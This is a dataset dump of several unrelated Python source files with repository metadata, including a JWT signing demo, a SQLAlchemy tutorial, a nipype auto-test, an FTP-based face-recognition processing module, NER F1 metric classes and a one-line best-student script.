f72eb0729c8579621c30a4f80dbbabfa81283a19 | 99 | py | Python | interpro7dw/interpro/mysql/__init__.py | matthiasblum/i7dw | b40e5b9984dec2895956828ddf9db8af4a8ec932 | [
"Apache-2.0"
] | null | null | null | interpro7dw/interpro/mysql/__init__.py | matthiasblum/i7dw | b40e5b9984dec2895956828ddf9db8af4a8ec932 | [
"Apache-2.0"
] | null | null | null | interpro7dw/interpro/mysql/__init__.py | matthiasblum/i7dw | b40e5b9984dec2895956828ddf9db8af4a8ec932 | [
"Apache-2.0"
] | null | null | null | from . import clans, databases, entries, proteins, proteomes, structures, taxa
from . import utils
| 33 | 78 | 0.777778 | from . import clans, databases, entries, proteins, proteomes, structures, taxa
from . import utils
| true | true |
f72eb080d6a45bd70ccbae966aa6a0f3c15c3a83 | 585 | py | Python | app/rsa.py | FusionAuth/-fusionauth-example-python-jwt | 3fb8cfd1d7c77306a3a5d92cb834fbf53eee61d9 | [
"Apache-2.0"
] | 2 | 2022-01-04T15:52:31.000Z | 2022-02-01T12:23:10.000Z | app/rsa.py | FusionAuth/fusionauth-example-python-jwt | 3fb8cfd1d7c77306a3a5d92cb834fbf53eee61d9 | [
"Apache-2.0"
] | null | null | null | app/rsa.py | FusionAuth/fusionauth-example-python-jwt | 3fb8cfd1d7c77306a3a5d92cb834fbf53eee61d9 | [
"Apache-2.0"
] | null | null | null | import datetime
import python_jwt as jwt
import jwcrypto.jwk as jwk
def run():
key = jwk.JWK.generate(kty='RSA', size=2048)
# User API
payload = { "iss": "fusionauth.io",
"aud": "238d4793-70de-4183-9707-48ed8ecd19d9",
"sub": "19016b73-3ffa-4b26-80d8-aa9287738677",
"name": "Dan Moore",
"roles": ["RETRIEVE_TODOS"]
}
encoded = jwt.generate_jwt(payload, key, "RS256", datetime.timedelta(minutes=5))
print(encoded)
# Todo API
decoded = jwt.verify_jwt(encoded, key, ["RS256"])
print(decoded)
| 22.5 | 82 | 0.601709 | import datetime
import python_jwt as jwt
import jwcrypto.jwk as jwk
def run():
key = jwk.JWK.generate(kty='RSA', size=2048)
payload = { "iss": "fusionauth.io",
"aud": "238d4793-70de-4183-9707-48ed8ecd19d9",
"sub": "19016b73-3ffa-4b26-80d8-aa9287738677",
"name": "Dan Moore",
"roles": ["RETRIEVE_TODOS"]
}
encoded = jwt.generate_jwt(payload, key, "RS256", datetime.timedelta(minutes=5))
print(encoded)
decoded = jwt.verify_jwt(encoded, key, ["RS256"])
print(decoded)
| true | true |
f72eb0fe13ca1abff84f6656134223f774bee5b5 | 3,510 | py | Python | database/sqlalchemy_test.py | Christine002/CalculatorHW1 | 07539a137fa69134c71388e67a5e1c98e5951f33 | [
"MIT"
] | null | null | null | database/sqlalchemy_test.py | Christine002/CalculatorHW1 | 07539a137fa69134c71388e67a5e1c98e5951f33 | [
"MIT"
] | null | null | null | database/sqlalchemy_test.py | Christine002/CalculatorHW1 | 07539a137fa69134c71388e67a5e1c98e5951f33 | [
"MIT"
] | null | null | null | from sqlalchemy import Column, ForeignKey, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from pprint import pprint
# Create an engine that stores data in the local directory's
# sqlalchemy_example.db file.
engine = create_engine('sqlite:////web/Sqlite-Data/example.db')
# this loads the sqlalchemy base class
Base = declarative_base()
# Setting up the classes that create the record objects and define the schema
class Person(Base):
__tablename__ = 'person'
# Here we define columns for the table person
# Notice that each column is also a normal Python instance attribute.
id = Column(Integer, primary_key=True)
name = Column(String(250), nullable=False)
class Address(Base):
__tablename__ = 'address'
# Here we define columns for the table address.
# Notice that each column is also a normal Python instance attribute.
id = Column(Integer, primary_key=True)
street_name = Column(String(250))
street_number = Column(String(250))
post_code = Column(String(250), nullable=False)
# creates the field to store the person id
person_id = Column(Integer, ForeignKey('person.id'))
# creates the relationship between the person and addresses. backref adds a property to the Person class to retrieve addresses
person = relationship("Person", backref="addresses")
# Create all tables in the engine. This is equivalent to "Create Table"
# statements in raw SQL.
Base.metadata.create_all(engine)
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
# A DBSession() instance establishes all conversations with the database
# and represents a "staging zone" for all the objects loaded into the
# database session object. Any change made against the objects in the
# session won't be persisted into the database until you call
# session.commit(). If you're not happy about the changes, you can
# revert all of them back to the last commit by calling
# session.rollback()
session = DBSession()
# Insert a Person in the person table
new_person1 = Person(name='Keith')
session.add(new_person1)
new_person2 = Person(name='Joe')
session.add(new_person1)
new_person3 = Person(name='Steve')
session.add(new_person1)
session.commit()
# Insert an Address in the address table using a loop
addresses = [
Address(post_code='00001', person=new_person1),
Address(post_code='00002', person=new_person2),
Address(post_code='00003', person=new_person3),
]
# Loop through addresses and commit them to the database
for address in addresses:
session.add(address)
session.commit()
# joins Person on Address
all_people = session.query(Person).join(Address).all()
# Accessing a person with their address, You have to loop the addresses property and remember it was added by the
# backref on the addresses class
for person in all_people:
# use the __dict__ magic method to have the object print it's properties
pprint(person.__dict__)
for address in person.addresses:
pprint(address.__dict__)
# Retrieving the inverse of the relationship. Notice I reverse the Person and Address to load the Address table
all_addresses = session.query(Address).join(Person).all()
for address in all_addresses:
# showing how to use the print function with printing text and data at the same time easily
print(f'{address.person.name} has a postal code of {address.post_code}')
| 36.5625 | 131 | 0.759829 | from sqlalchemy import Column, ForeignKey, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from pprint import pprint
# sqlalchemy_example.db file.
engine = create_engine('sqlite:////web/Sqlite-Data/example.db')
# this loads the sqlalchemy base class
Base = declarative_base()
# Setting up the classes that create the record objects and define the schema
class Person(Base):
__tablename__ = 'person'
# Here we define columns for the table person
# Notice that each column is also a normal Python instance attribute.
id = Column(Integer, primary_key=True)
name = Column(String(250), nullable=False)
class Address(Base):
__tablename__ = 'address'
# Here we define columns for the table address.
# Notice that each column is also a normal Python instance attribute.
id = Column(Integer, primary_key=True)
street_name = Column(String(250))
street_number = Column(String(250))
post_code = Column(String(250), nullable=False)
# creates the field to store the person id
person_id = Column(Integer, ForeignKey('person.id'))
# creates the relationship between the person and addresses. backref adds a property to the Person class to retrieve addresses
person = relationship("Person", backref="addresses")
# Create all tables in the engine. This is equivalent to "Create Table"
# statements in raw SQL.
Base.metadata.create_all(engine)
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
# A DBSession() instance establishes all conversations with the database
# and represents a "staging zone" for all the objects loaded into the
# database session object. Any change made against the objects in the
# session won't be persisted into the database until you call
# revert all of them back to the last commit by calling
# session.rollback()
session = DBSession()
# Insert a Person in the person table
new_person1 = Person(name='Keith')
session.add(new_person1)
new_person2 = Person(name='Joe')
session.add(new_person1)
new_person3 = Person(name='Steve')
session.add(new_person1)
session.commit()
# Insert an Address in the address table using a loop
addresses = [
Address(post_code='00001', person=new_person1),
Address(post_code='00002', person=new_person2),
Address(post_code='00003', person=new_person3),
]
# Loop through addresses and commit them to the database
for address in addresses:
session.add(address)
session.commit()
# joins Person on Address
all_people = session.query(Person).join(Address).all()
# Accessing a person with their address, You have to loop the addresses property and remember it was added by the
# backref on the addresses class
for person in all_people:
# use the __dict__ magic method to have the object print it's properties
pprint(person.__dict__)
for address in person.addresses:
pprint(address.__dict__)
all_addresses = session.query(Address).join(Person).all()
for address in all_addresses:
print(f'{address.person.name} has a postal code of {address.post_code}')
| true | true |
f72eb2bdfe5df62c8e4ef216181ab120564060ca | 934 | py | Python | nipype/interfaces/tests/test_auto_DataGrabber.py | Conxz/nipype | 1281723ae56eacd103597ff4081a205583706e62 | [
"Apache-2.0"
] | null | null | null | nipype/interfaces/tests/test_auto_DataGrabber.py | Conxz/nipype | 1281723ae56eacd103597ff4081a205583706e62 | [
"Apache-2.0"
] | 2 | 2017-10-05T21:08:38.000Z | 2018-10-09T23:01:23.000Z | nipype/interfaces/tests/test_auto_DataGrabber.py | Conxz/nipype | 1281723ae56eacd103597ff4081a205583706e62 | [
"Apache-2.0"
] | 1 | 2016-10-11T19:18:53.000Z | 2016-10-11T19:18:53.000Z | # AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from ...testing import assert_equal
from ..io import DataGrabber
def test_DataGrabber_inputs():
input_map = dict(base_directory=dict(),
ignore_exception=dict(nohash=True,
usedefault=True,
),
raise_on_empty=dict(usedefault=True,
),
sort_filelist=dict(mandatory=True,
),
template=dict(mandatory=True,
),
template_args=dict(),
)
inputs = DataGrabber.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(inputs.traits()[key], metakey), value
def test_DataGrabber_outputs():
output_map = dict()
outputs = DataGrabber.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(outputs.traits()[key], metakey), value
| 28.30303 | 78 | 0.679872 |
from ...testing import assert_equal
from ..io import DataGrabber
def test_DataGrabber_inputs():
input_map = dict(base_directory=dict(),
ignore_exception=dict(nohash=True,
usedefault=True,
),
raise_on_empty=dict(usedefault=True,
),
sort_filelist=dict(mandatory=True,
),
template=dict(mandatory=True,
),
template_args=dict(),
)
inputs = DataGrabber.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(inputs.traits()[key], metakey), value
def test_DataGrabber_outputs():
output_map = dict()
outputs = DataGrabber.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(outputs.traits()[key], metakey), value
| true | true |
f72eb2f1472da936493f1cf75785a6413c1e7e61 | 7,405 | py | Python | examples/face_recogniser/content/processing.py | kjarczak/balticlsc_module | d104c66fbfeb2147e8a40a0fa5170326843854c5 | [
"MIT"
] | null | null | null | examples/face_recogniser/content/processing.py | kjarczak/balticlsc_module | d104c66fbfeb2147e8a40a0fa5170326843854c5 | [
"MIT"
] | null | null | null | examples/face_recogniser/content/processing.py | kjarczak/balticlsc_module | d104c66fbfeb2147e8a40a0fa5170326843854c5 | [
"MIT"
] | 1 | 2021-06-24T07:57:40.000Z | 2021-06-24T07:57:40.000Z | import os
from typing import List, Tuple, Dict
import face_recognition
from matplotlib import pyplot, patches
from PIL import Image
import numpy as np
from balticlsc.access.ftp import upload_file, get_connection
from balticlsc.configs.credential.ftp import FTPCredential
from balticlsc.scheme.api import init_baltic_api
from balticlsc.scheme.logger import logger
from balticlsc.scheme.pin import Pin, MissingPin, PinAttribute, ValuesAttribute
from balticlsc.scheme.processing import ProcessingInterface
from balticlsc.scheme.utils import camel_to_snake, get_random_output_folder
MODULE_VERSION = 'latest'
class Processing(ProcessingInterface):
def process(self, msg_uid: str, input_pin: Pin, output_pin_name_to_value: Dict[str, Pin]) -> None:
logger.info('module version = ' + MODULE_VERSION)
logger.info('starting processing for input pin="' + str(input_pin) + '"')
input_access_credential = input_pin.getattr(PinAttribute.ACCESS_CREDENTIAL)
input_folder = input_pin.getattr(PinAttribute.ACCESS_PATH)
if input_access_credential is None:
raise ValueError(f'missing access credential in the input pin={str(input_pin)}')
if input_folder is None:
raise ValueError(f'missing access path in the input pin={str(input_pin)}')
input_ftp_credential = FTPCredential(**input_access_credential)
# START # Establish the output access credential and folder # START #
output_pin_name: str = 'Output'
if output_pin_name not in output_pin_name_to_value:
error_msg = 'missing pin with name="' + output_pin_name + '" in output pins config'
logger.error(error_msg)
raise MissingPin([pin for pin in output_pin_name_to_value.values()], error_msg)
output_pin = output_pin_name_to_value[output_pin_name]
logger.info('loading output pin=' + str(output_pin))
output_access_credential = output_pin.getattr(PinAttribute.ACCESS_CREDENTIAL)
if output_access_credential is None:
logger.info('output pin access credentials is None, using input access credentials')
output_ftp_credential = input_ftp_credential
else:
output_access_credential = {camel_to_snake(key): value for key, value in output_access_credential.items()}
if str(output_access_credential) == str(input_access_credential):
logger.info('input and output access credential are the same')
output_ftp_credential = input_ftp_credential
else:
output_ftp_credential = FTPCredential(**output_access_credential)
output_access_path = output_pin.getattr(PinAttribute.ACCESS_PATH)
if output_access_path is None:
logger.info('access path is not provided in output config')
logger.info('setting random generated string as output folder name')
output_folder = get_random_output_folder(input_folder)
else:
output_access_path = {camel_to_snake(key): value for key, value in output_access_path.items()}
if 'resource_path' not in output_access_path:
logger.info('missing "resource_path" value in output access path')
logger.info('setting random generated string as output folder name')
output_folder = get_random_output_folder(input_folder)
else:
output_folder = output_access_path['resource_path']
logger.info('setting output folder based on output pin config "resource_path"=' + output_folder)
# STOP # Establish output credentials and folder # STOP #
logger.info('connecting to input ftp server: ' + input_ftp_credential.host)
input_ftp = get_connection(input_ftp_credential)
if output_ftp_credential != input_ftp_credential:
logger.info('connecting to output ftp server: ' + output_ftp_credential.host)
output_ftp = get_connection(output_ftp_credential)
else:
logger.info('using the same connection as output ftp')
output_ftp = input_ftp
# START # process and send files # START #
logger.info('changing ftp working directory to "' + input_folder + '"')
input_ftp.cwd(input_folder)
logger.info('working directory changed')
logger.info('listing files in the working directory ...')
filenames: List[str] = input_ftp.nlst()
logger.info('handling ' + str(len(filenames)) + ' files')
os.makedirs('tmp', exist_ok=True)
for filename in filenames:
if not filename.lower().endswith(('.png', '.jpg', '.jpeg', '.tiff', '.bmp', '.gif')):
logger.warning('wrong format of the file "' + filename + '", omitting')
continue
logger.info('downloading file "' + filename + '"')
filepath = 'tmp/' + filename
# Save the image locally
with open(filepath, 'wb') as file:
input_ftp.retrbinary("RETR " + filename, file.write)
# Mark faces and save the image
image = np.array(Image.open(filepath))
im = Image.fromarray(image)
im.save(filepath)
height: int = image.shape[0]
width: int = image.shape[1]
dpi: int = 100
faces_coords: List[Tuple[int]] = face_recognition.face_locations(image)
figure = pyplot.figure(frameon=False, dpi=dpi)
figure.set_size_inches(width / dpi, height / dpi)
ax = pyplot.Axes(figure, [0., 0., 1., 1.])
ax.set_axis_off()
figure.add_axes(ax)
ax.imshow(image)
logger.info('adding ' + str(len(faces_coords)) + ' faces to image "' + filename + '"')
fig = pyplot.gcf()
fig.savefig(fname=filepath, dpi=dpi, bbox_inches='tight')
for index in range(len(faces_coords)):
x_start = faces_coords[index][3]
y_start = faces_coords[index][0]
x_width = (faces_coords[index][1] - faces_coords[index][3])
y_height = (faces_coords[index][2] - faces_coords[index][0])
rect = patches.Rectangle((x_start, y_start), x_width, y_height,
edgecolor='r', facecolor="none")
ax.add_patch(rect)
pyplot.savefig(fname=filepath, dpi=dpi, bbox_inches='tight')
pyplot.close()
# Send file to ftp
with open(filepath, 'rb') as file:
logger.info('uploading file "' + filename + '" into ' + output_folder)
upload_file(filename, output_folder, output_ftp, file)
file.close() # close file and FTP
input_ftp.cwd(input_folder)
# STOP # process and send files # STOP #
input_ftp.quit()
if output_ftp_credential != input_ftp_credential:
output_ftp.quit()
rest_client.send_output_token(
base_msg_uid=msg_uid,
values={
ValuesAttribute.RESOURCE_PATH: output_folder
},
output_pin_name=output_pin.getattr(PinAttribute.NAME))
rest_client.send_ack_token(
msg_uids=[msg_uid],
is_final=True,
is_failed=False,
)
app, rest_client = init_baltic_api(Processing)
| 45.709877 | 118 | 0.640648 | import os
from typing import List, Tuple, Dict
import face_recognition
from matplotlib import pyplot, patches
from PIL import Image
import numpy as np
from balticlsc.access.ftp import upload_file, get_connection
from balticlsc.configs.credential.ftp import FTPCredential
from balticlsc.scheme.api import init_baltic_api
from balticlsc.scheme.logger import logger
from balticlsc.scheme.pin import Pin, MissingPin, PinAttribute, ValuesAttribute
from balticlsc.scheme.processing import ProcessingInterface
from balticlsc.scheme.utils import camel_to_snake, get_random_output_folder
MODULE_VERSION = 'latest'
class Processing(ProcessingInterface):
def process(self, msg_uid: str, input_pin: Pin, output_pin_name_to_value: Dict[str, Pin]) -> None:
logger.info('module version = ' + MODULE_VERSION)
logger.info('starting processing for input pin="' + str(input_pin) + '"')
input_access_credential = input_pin.getattr(PinAttribute.ACCESS_CREDENTIAL)
input_folder = input_pin.getattr(PinAttribute.ACCESS_PATH)
if input_access_credential is None:
raise ValueError(f'missing access credential in the input pin={str(input_pin)}')
if input_folder is None:
raise ValueError(f'missing access path in the input pin={str(input_pin)}')
input_ftp_credential = FTPCredential(**input_access_credential)
t in output_pin_name_to_value:
error_msg = 'missing pin with name="' + output_pin_name + '" in output pins config'
logger.error(error_msg)
raise MissingPin([pin for pin in output_pin_name_to_value.values()], error_msg)
output_pin = output_pin_name_to_value[output_pin_name]
logger.info('loading output pin=' + str(output_pin))
output_access_credential = output_pin.getattr(PinAttribute.ACCESS_CREDENTIAL)
if output_access_credential is None:
logger.info('output pin access credentials is None, using input access credentials')
output_ftp_credential = input_ftp_credential
else:
output_access_credential = {camel_to_snake(key): value for key, value in output_access_credential.items()}
if str(output_access_credential) == str(input_access_credential):
logger.info('input and output access credential are the same')
output_ftp_credential = input_ftp_credential
else:
output_ftp_credential = FTPCredential(**output_access_credential)
output_access_path = output_pin.getattr(PinAttribute.ACCESS_PATH)
if output_access_path is None:
logger.info('access path is not provided in output config')
logger.info('setting random generated string as output folder name')
output_folder = get_random_output_folder(input_folder)
else:
output_access_path = {camel_to_snake(key): value for key, value in output_access_path.items()}
if 'resource_path' not in output_access_path:
logger.info('missing "resource_path" value in output access path')
logger.info('setting random generated string as output folder name')
output_folder = get_random_output_folder(input_folder)
else:
output_folder = output_access_path['resource_path']
logger.info('setting output folder based on output pin config "resource_path"=' + output_folder)
nput_ftp_credential.host)
input_ftp = get_connection(input_ftp_credential)
if output_ftp_credential != input_ftp_credential:
logger.info('connecting to output ftp server: ' + output_ftp_credential.host)
output_ftp = get_connection(output_ftp_credential)
else:
logger.info('using the same connection as output ftp')
output_ftp = input_ftp
irectory to "' + input_folder + '"')
input_ftp.cwd(input_folder)
logger.info('working directory changed')
logger.info('listing files in the working directory ...')
filenames: List[str] = input_ftp.nlst()
logger.info('handling ' + str(len(filenames)) + ' files')
os.makedirs('tmp', exist_ok=True)
for filename in filenames:
if not filename.lower().endswith(('.png', '.jpg', '.jpeg', '.tiff', '.bmp', '.gif')):
logger.warning('wrong format of the file "' + filename + '", omitting')
continue
logger.info('downloading file "' + filename + '"')
filepath = 'tmp/' + filename
with open(filepath, 'wb') as file:
input_ftp.retrbinary("RETR " + filename, file.write)
image = np.array(Image.open(filepath))
im = Image.fromarray(image)
im.save(filepath)
height: int = image.shape[0]
width: int = image.shape[1]
dpi: int = 100
faces_coords: List[Tuple[int]] = face_recognition.face_locations(image)
figure = pyplot.figure(frameon=False, dpi=dpi)
figure.set_size_inches(width / dpi, height / dpi)
ax = pyplot.Axes(figure, [0., 0., 1., 1.])
ax.set_axis_off()
figure.add_axes(ax)
ax.imshow(image)
logger.info('adding ' + str(len(faces_coords)) + ' faces to image "' + filename + '"')
fig = pyplot.gcf()
fig.savefig(fname=filepath, dpi=dpi, bbox_inches='tight')
for index in range(len(faces_coords)):
x_start = faces_coords[index][3]
y_start = faces_coords[index][0]
x_width = (faces_coords[index][1] - faces_coords[index][3])
y_height = (faces_coords[index][2] - faces_coords[index][0])
rect = patches.Rectangle((x_start, y_start), x_width, y_height,
edgecolor='r', facecolor="none")
ax.add_patch(rect)
pyplot.savefig(fname=filepath, dpi=dpi, bbox_inches='tight')
pyplot.close()
with open(filepath, 'rb') as file:
logger.info('uploading file "' + filename + '" into ' + output_folder)
upload_file(filename, output_folder, output_ftp, file)
file.close()
input_ftp.cwd(input_folder)
ut_ftp_credential != input_ftp_credential:
output_ftp.quit()
rest_client.send_output_token(
base_msg_uid=msg_uid,
values={
ValuesAttribute.RESOURCE_PATH: output_folder
},
output_pin_name=output_pin.getattr(PinAttribute.NAME))
rest_client.send_ack_token(
msg_uids=[msg_uid],
is_final=True,
is_failed=False,
)
app, rest_client = init_baltic_api(Processing)
| true | true |
f72eb3531991a856678c5e8125ca3770d94382aa | 6,355 | py | Python | UNF/training/metric.py | waterzxj/UNF | 5eda8e7c60116735f595f4b21b24547708b36cf5 | [
"Apache-2.0"
] | 86 | 2020-02-23T13:38:11.000Z | 2022-03-01T12:09:28.000Z | UNF/training/metric.py | Dreamliking/UNF | 5eda8e7c60116735f595f4b21b24547708b36cf5 | [
"Apache-2.0"
] | 2 | 2020-04-20T08:33:05.000Z | 2020-05-13T13:43:08.000Z | UNF/training/metric.py | Dreamliking/UNF | 5eda8e7c60116735f595f4b21b24547708b36cf5 | [
"Apache-2.0"
] | 14 | 2020-03-07T05:21:44.000Z | 2021-05-09T16:57:23.000Z | #coding:utf-8
import torch
from learner_util import get_ner_BIO
class Metric(object):
def __call__(self,
predictions,
gold_labels,
mask=None):
"""
metric的抽象类
:params predictions 预测结果的tensor
:params gold_labels 实际结果的tensor
:mask mask
"""
raise NotImplementedError
def get_metric(self, reset=False):
"""
返回metric的指标
"""
raise NotImplementedError
def reset(self):
"""
重置内部状态
"""
raise NotImplementedError
@staticmethod
def unwrap_to_tensors(*tensors):
"""
把tensor安全的copy到cpu进行操作,避免gpu的oom
"""
return (x.detach().cpu() if isinstance(x, torch.Tensor) else x for x in tensors)
@classmethod
def from_option(cls, conf):
return cls(**conf)
class F1Measure(Metric):
def __init__(self, positive_label):
"""
准确率、召回率、F值的评价指标
"""
super(F1Measure, self).__init__()
self._positive_label = positive_label
self._true_positives = 0.0
self._true_negatives = 0.0
self._false_positives = 0.0
self._false_negatives = 0.0
def __call__(self,
predictions,
gold_labels,
mask=None):
predictions, gold_labels, mask = self.unwrap_to_tensors(predictions, gold_labels, mask)
num_classes = predictions.size(-1)
if (gold_labels >= num_classes).any():
raise Exception("A gold label passed to F1Measure contains an id >= {}, "
"the number of classes.".format(num_classes))
if mask is None:
mask = torch.ones_like(gold_labels)
mask = mask.float()
gold_labels = gold_labels.float()
self.update(predictions, gold_labels, mask)
def update(self, predictions, gold_labels, mask):
positive_label_mask = gold_labels.eq(self._positive_label).float()
negative_label_mask = 1.0 - positive_label_mask
argmax_predictions = predictions.max(-1)[1].float().squeeze(-1)
# True Negatives: correct non-positive predictions.
correct_null_predictions = (argmax_predictions !=
self._positive_label).float() * negative_label_mask
self._true_negatives += (correct_null_predictions.float() * mask).sum()
# True Positives: correct positively labeled predictions.
correct_non_null_predictions = (argmax_predictions ==
self._positive_label).float() * positive_label_mask
self._true_positives += (correct_non_null_predictions * mask).sum()
# False Negatives: incorrect negatively labeled predictions.
incorrect_null_predictions = (argmax_predictions !=
self._positive_label).float() * positive_label_mask
self._false_negatives += (incorrect_null_predictions * mask).sum()
# False Positives: incorrect positively labeled predictions
incorrect_non_null_predictions = (argmax_predictions ==
self._positive_label).float() * negative_label_mask
self._false_positives += (incorrect_non_null_predictions * mask).sum()
def get_metric(self, reset=False):
"""
返回准确率、召回率、F值评价指标
"""
# print('TP',self._true_positives,'TN',self._true_negatives,'FP',self._false_positives,'FN',self._false_negatives)
precision = float(self._true_positives) / float(self._true_positives + self._false_positives + 1e-13)
recall = float(self._true_positives) / float(self._true_positives + self._false_negatives + 1e-13)
f1_measure = 2. * ((precision * recall) / (precision + recall + 1e-13))
if reset:
self.reset()
return {"precision":precision, "recall": recall, "f1_measure":f1_measure}
def reset(self):
self._true_positives = 0.0
self._true_negatives = 0.0
self._false_positives = 0.0
self._false_negatives = 0.0
class NerF1Measure(Metric):
def __init__(self, label_vocab):
self.golden_num = 0.0
self.predict_num = 0.0
self.right_num = 0.0
self.label_vocab = label_vocab
def reset(self):
"""
重置内部状态
"""
self.golden_num = 0.0
self.predict_num = 0.0
self.right_num = 0.0
def get_metric(self, reset=False):
"""
返回metric的指标
"""
if self.predict_num == 0.0:
precision = -1
else:
precision = (self.right_num+0.0)/self.predict_num
if self.golden_num == 0.0:
recall = -1
else:
recall = (self.right_num+0.0)/self.golden_num
if (precision == -1) or (recall == -1) or (precision+recall) <= 0.:
f_measure = -1
else:
f_measure = 2*precision*recall/(precision+recall)
if reset:
self.reset()
return {"precision":precision, "recall": recall, "f1_measure":f_measure}
def update(self, gold_matrix, pred_matrix):
right_ner = list(set(gold_matrix).intersection(set(pred_matrix)))
self.golden_num += len(gold_matrix)
self.predict_num += len(pred_matrix)
self.right_num += len(right_ner)
def __call__(self,
predictions,
gold_labels,
mask=None):
"""
metric的抽象类
:params predictions 预测结果的tensor
:params gold_labels 实际结果的tensor
:mask mask
"""
batch_size = gold_labels.size(0)
seq_len = gold_labels.size(1)
predictions, gold_labels, mask = self.unwrap_to_tensors(predictions, gold_labels,
mask)
predictions = predictions.tolist()
gold_labels = gold_labels.tolist()
mask = mask.tolist()
for idx in range(batch_size):
pred = [self.label_vocab[predictions[idx][idy]] for idy in range(seq_len) if mask[idx][idy] != 0]
gold = [self.label_vocab[gold_labels[idx][idy]] for idy in range(seq_len) if mask[idx][idy] != 0]
gold_matrix = get_ner_BIO(gold)
pred_matrix = get_ner_BIO(pred)
self.update(gold_matrix, pred_matrix)
| 32.09596 | 122 | 0.59465 |
import torch
from learner_util import get_ner_BIO
class Metric(object):
def __call__(self,
predictions,
gold_labels,
mask=None):
raise NotImplementedError
def get_metric(self, reset=False):
raise NotImplementedError
def reset(self):
raise NotImplementedError
@staticmethod
def unwrap_to_tensors(*tensors):
return (x.detach().cpu() if isinstance(x, torch.Tensor) else x for x in tensors)
@classmethod
def from_option(cls, conf):
return cls(**conf)
class F1Measure(Metric):
def __init__(self, positive_label):
super(F1Measure, self).__init__()
self._positive_label = positive_label
self._true_positives = 0.0
self._true_negatives = 0.0
self._false_positives = 0.0
self._false_negatives = 0.0
def __call__(self,
predictions,
gold_labels,
mask=None):
predictions, gold_labels, mask = self.unwrap_to_tensors(predictions, gold_labels, mask)
num_classes = predictions.size(-1)
if (gold_labels >= num_classes).any():
raise Exception("A gold label passed to F1Measure contains an id >= {}, "
"the number of classes.".format(num_classes))
if mask is None:
mask = torch.ones_like(gold_labels)
mask = mask.float()
gold_labels = gold_labels.float()
self.update(predictions, gold_labels, mask)
def update(self, predictions, gold_labels, mask):
positive_label_mask = gold_labels.eq(self._positive_label).float()
negative_label_mask = 1.0 - positive_label_mask
argmax_predictions = predictions.max(-1)[1].float().squeeze(-1)
correct_null_predictions = (argmax_predictions !=
self._positive_label).float() * negative_label_mask
self._true_negatives += (correct_null_predictions.float() * mask).sum()
correct_non_null_predictions = (argmax_predictions ==
self._positive_label).float() * positive_label_mask
self._true_positives += (correct_non_null_predictions * mask).sum()
incorrect_null_predictions = (argmax_predictions !=
self._positive_label).float() * positive_label_mask
self._false_negatives += (incorrect_null_predictions * mask).sum()
incorrect_non_null_predictions = (argmax_predictions ==
self._positive_label).float() * negative_label_mask
self._false_positives += (incorrect_non_null_predictions * mask).sum()
def get_metric(self, reset=False):
precision = float(self._true_positives) / float(self._true_positives + self._false_positives + 1e-13)
recall = float(self._true_positives) / float(self._true_positives + self._false_negatives + 1e-13)
f1_measure = 2. * ((precision * recall) / (precision + recall + 1e-13))
if reset:
self.reset()
return {"precision":precision, "recall": recall, "f1_measure":f1_measure}
def reset(self):
self._true_positives = 0.0
self._true_negatives = 0.0
self._false_positives = 0.0
self._false_negatives = 0.0
class NerF1Measure(Metric):
def __init__(self, label_vocab):
self.golden_num = 0.0
self.predict_num = 0.0
self.right_num = 0.0
self.label_vocab = label_vocab
def reset(self):
self.golden_num = 0.0
self.predict_num = 0.0
self.right_num = 0.0
def get_metric(self, reset=False):
if self.predict_num == 0.0:
precision = -1
else:
precision = (self.right_num+0.0)/self.predict_num
if self.golden_num == 0.0:
recall = -1
else:
recall = (self.right_num+0.0)/self.golden_num
if (precision == -1) or (recall == -1) or (precision+recall) <= 0.:
f_measure = -1
else:
f_measure = 2*precision*recall/(precision+recall)
if reset:
self.reset()
return {"precision":precision, "recall": recall, "f1_measure":f_measure}
def update(self, gold_matrix, pred_matrix):
right_ner = list(set(gold_matrix).intersection(set(pred_matrix)))
self.golden_num += len(gold_matrix)
self.predict_num += len(pred_matrix)
self.right_num += len(right_ner)
def __call__(self,
predictions,
gold_labels,
mask=None):
batch_size = gold_labels.size(0)
seq_len = gold_labels.size(1)
predictions, gold_labels, mask = self.unwrap_to_tensors(predictions, gold_labels,
mask)
predictions = predictions.tolist()
gold_labels = gold_labels.tolist()
mask = mask.tolist()
for idx in range(batch_size):
pred = [self.label_vocab[predictions[idx][idy]] for idy in range(seq_len) if mask[idx][idy] != 0]
gold = [self.label_vocab[gold_labels[idx][idy]] for idy in range(seq_len) if mask[idx][idy] != 0]
gold_matrix = get_ner_BIO(gold)
pred_matrix = get_ner_BIO(pred)
self.update(gold_matrix, pred_matrix)
| true | true |
f72eb416f3eae037abbad9c26911354d1395878a | 235 | py | Python | CA117/Lab_4/beststudent_31_v1.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 6 | 2016-02-04T00:15:20.000Z | 2019-10-13T13:53:16.000Z | CA117/Lab_4/beststudent_31_v1.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 2 | 2016-03-14T04:01:36.000Z | 2019-10-16T12:45:34.000Z | CA117/Lab_4/beststudent_31_v1.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 10 | 2016-02-09T14:38:32.000Z | 2021-05-25T08:16:26.000Z | (lambda a:print("Best student: {1} {2}\nBest mark: {0}".format(*max([line.split()for line in open(a,'r')],key=lambda x:int(x[0]))))if __import__('os').path.isfile(a)else print("ERROR: File not found! " + a))(__import__('sys').argv[1])
| 117.5 | 234 | 0.651064 | (lambda a:print("Best student: {1} {2}\nBest mark: {0}".format(*max([line.split()for line in open(a,'r')],key=lambda x:int(x[0]))))if __import__('os').path.isfile(a)else print("ERROR: File not found! " + a))(__import__('sys').argv[1])
| true | true |
